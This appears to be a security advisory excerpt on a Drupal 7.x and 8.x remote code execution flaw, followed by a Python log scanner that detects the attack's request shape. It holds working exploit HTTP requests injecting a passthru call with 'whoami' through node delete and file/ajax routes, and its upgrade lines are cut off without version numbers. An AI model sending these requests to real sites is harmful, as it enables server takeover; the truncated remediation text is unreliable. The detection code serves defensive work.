Multiple subsystems of Drupal 7.x and 8.x are vulnerable to remote code execution (RCE) because they do not properly sanitize URL endpoints where arrays can be supplied through URL parameters.
You must be authenticated and have permission to delete a node. Some other forms may also be vulnerable: at least all forms that work in two steps (form, then confirm).
POST /?q=node/99/delete&destination=node?q[%2523]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, then trigger the exploit with:
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the
7.x, upgrade to Drupal
8.5.x, upgrade to Drupal
8.4.x, upgrade to Drupal
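A log-side check for the request shape shown above, as an added example that is not part of the original advisory. It percent-decodes each request target repeatedly (the sample request uses the double-encoded %2523) and flags array keys beginning with '#' as well as a '#' path segment on the file/ajax route; the function names, decode limit and log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: enough for double encoding (%2523 -> %23 -> #)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
HASH_KEY = re.compile(r"\[#[^\]]*\]")         # array key such as q[#type]
AJAX_HASH = re.compile(r"file/ajax/[^&]*/#")   # '#' path segment on file/ajax

def fully_decode(value):
    """Percent-decode repeatedly so nested encodings cannot hide a '#'."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def findings(request_target):
    """Return the reasons a request target matches the pattern, if any."""
    decoded = fully_decode(request_target)
    reasons = ["array key " + key for key in HASH_KEY.findall(decoded)]
    if AJAX_HASH.search(decoded):
        reasons.append("'#' path segment in file/ajax route")
    return reasons

def scan(log_lines):
    """Map 1-based line numbers to findings for lines that match."""
    hits = {}
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        reasons = findings(match.group(1)) if match else []
        if reasons:
            hits[number] = reasons
    return hits

# Constructed sample access-log lines (not captured traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?q=node/12&page[0]=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "POST /?q=node/99/delete&destination=node?q[%2523type]=markup%26q[%2523markup]=test HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "POST /?q=file/ajax/actions/cancel/%23options/path/form-EXAMPLE HTTP/1.1" 200 300',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?q=search/node/a%23b&tags[]=x HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG).items():
        print(number, reasons)
```

The access log only records the request line, so parameters sent in a POST body are not visible to this check.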